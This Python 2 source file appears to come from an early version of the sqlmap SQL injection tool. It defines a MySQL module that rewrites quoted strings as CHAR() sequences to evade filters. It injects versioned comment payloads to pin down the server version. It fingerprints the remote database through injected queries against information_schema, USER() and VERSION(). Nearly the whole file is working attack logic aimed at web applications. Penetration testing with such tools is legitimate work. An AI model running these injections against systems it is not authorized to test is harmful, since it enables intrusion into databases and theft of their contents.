#!/usr/bin/env python


import random
import re

from sqlmap.query import QueryMap


class MySQLMap(QueryMap):
    """
    This class defines MySQL methods

    @author: Bernardo Damele and Daniele Bellucci
    """

    def __init__(self, args):
        self.has_information_schema = False
        QueryMap.__init__(self, args, "MySQL")


    def unescape(self, expression):
        while True:
            index = expression.find("'")
            if index == -1:
                break

            firstIndex = index + 1
            index = expression[firstIndex:].find("'")

            if index == -1:
                raise Exception, "Unenclosed ' in '%s'" % expression

            lastIndex = firstIndex + index
            old = "'%s'" % expression[firstIndex:lastIndex]
            unescaped = ""

            for i in range(firstIndex, lastIndex):
                unescaped += "%d" % (ord(expression[i]))
                if i < lastIndex - 1:
                    unescaped += ","

            expression = expression.replace(old, "CHAR(%s)" % unescaped)

        return expression


    def __commentCheck(self):
        logMsg = "executing MySQL comment injection fingerprint"
        self.logger.info(logMsg)

        query = self.injectionQuery(" /* NoValue */", 
                                    " /* NoValue */ AND '1",
                                    " /* NoValue */ AND \"1")
        payload = self.payload(newValue=query)
        result = self.queryPage(payload)

        if result != self.args.defaultResult:
            warnMsg = "unable to perform MySQL comment injection"
            self.logger.warn(warnMsg)

            return None

        # MySQL valid versions updated at 10/2007
        versions = (
                     (32200, 32233),    # MySQL 3.22
                     (32300, 32354),    # MySQL 3.23
                     (40000, 40024),    # MySQL 4.0
                     (40100, 40122),    # MySQL 4.1
                     (50000, 50045),    # MySQL 5.0
                     (50100, 50114),    # MySQL 5.1
                   )

        for element in versions:
            for version in range(element[0], element[1] + 1):
                version = str(version)
                query = self.injectionQuery(" /*!%s AND 1=2*/" % version,
                                            " /*!%s AND 1=2*/ AND '1" % version,
                                            " /*!%s AND 1=2*/ AND \"1" % version)
                payload = self.payload(newValue=query)
                result = self.queryPage(payload)

                if result == self.args.defaultResult:
                    if version[0] == "3":
                        midVer = prevVer[1:3]
                    else:
                        midVer = prevVer[2]

                    trueVer = "%s.%s.%s" % (prevVer[0], midVer, prevVer[3:])

                    return trueVer

                prevVer = version

        return None


    def getFingerprint(self):
        actVer = self.parseFp("MySQL", self.fingerprint)

        if not self.args.exaustiveFp:
            return actVer

        blank = " " * 16
        value = "active fingerprint: %s" % actVer
        comVer = self.__commentCheck()

        if comVer:
            comVer = self.parseFp("MySQL", [comVer])
            value += "\n%scomment injection fingerprint: %s" % (blank, comVer)

        if self.banner:
            banVer = re.search("^([\d\.]+)", self.banner)
            banVer = banVer.groups()[0]
            if re.search("-log$", self.banner):
                banVer += ", logging enabled"
            banVer = self.parseFp("MySQL", [banVer])

            value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)

        self.passiveFuzzing()
        htmlParsed = self.getHtmlErrorFp()

        if htmlParsed:
            value += "\n%shtml error message fingerprint: %s" % (blank, htmlParsed)

        return value


    def checkDbms(self):
        if self.args.dbms == "mysql" and self.args.MySQLVer:
            self.setDbms("MySQL")

            if self.args.MySQLVer[0] in ("1", "3", "4"):
                self.has_information_schema = False
            elif self.args.MySQLVer[0] == "5":
                self.has_information_schema = True

            if not self.args.exaustiveFp:
                return True

        logMsg = "testing MySQL"
        self.logger.info(logMsg)

        randInt = str(random.randint(1, 9))
        query = "CONCAT('%s', '%s')" % (randInt, randInt)

        if self.getValue(query) == (randInt * 2):
            logMsg = "confirming MySQL"
            self.logger.info(logMsg)

            query = "LENGTH('%s')" % randInt

            if not self.getValue(query) == "1":
                warnMsg = "the remote DMBS is not MySQL"
                self.logger.warn(warnMsg)

                return False

            self.setDbms("MySQL")

            query  = "SELECT %s " % randInt
            query += "FROM information_schema.TABLES "
            query += "LIMIT 0, 1"

            if self.getValue(query) == randInt:
                self.has_information_schema = True

                if not self.args.exaustiveFp:
                    self.fingerprint = [">= 5.0.0"]
                    return True

                self.currentDb = self.getValue("DATABASE()")
                if self.currentDb == self.getValue("SCHEMA()"):
                    self.fingerprint = [">= 5.0.2", "< 5.1"]

                    query  = "SELECT %s " % randInt
                    query += "FROM information_schema.PARTITIONS "
                    query += "LIMIT 0, 1"

                    if self.getValue(query) == randInt:
                        self.fingerprint = [">= 5.1"]
                else:
                    self.fingerprint = ["= 5.0.0 or 5.0.1"]
            else:
                self.fingerprint = ["< 5.0.0"]

                if not self.args.exaustiveFp:
                    return True

                coercibility = self.getValue("COERCIBILITY(USER())")
                if coercibility == "3":
                    self.fingerprint = [">= 4.1.11", "< 5.0.0"]
                elif coercibility == "2":
                    self.fingerprint = [">= 4.1.1", "< 4.1.11"]
                elif self.getValue("CURRENT_USER()"):
                    self.fingerprint = [">= 4.0.6", "< 4.1.1"]

                    if self.getValue("CHARSET(CURRENT_USER())") == "utf8":
                        self.fingerprint = ["= 4.1.0"]
                    else:
                        self.fingerprint = [">= 4.0.6", "< 4.1.0"]
                elif self.getValue("FOUND_ROWS()") == "0":
                    self.fingerprint = [">= 4.0.0", "< 4.0.6"]
                elif self.getValue("CONNECTION_ID()"):
                    self.fingerprint = [">= 3.23.14", "< 4.0.0"]
                elif re.search("@[\w\.\-\_]+", self.getValue("USER()")):
                    self.fingerprint = [">= 3.22.11", "< 3.23.14"]
                else:
                    self.fingerprint = ["< 3.22.11"]

            if self.args.getBanner:
                self.banner = self.getValue("VERSION()")

            return True
        else:
            warnMsg = "the remote DMBS is not MySQL"
            self.logger.warn(warnMsg)

            return False

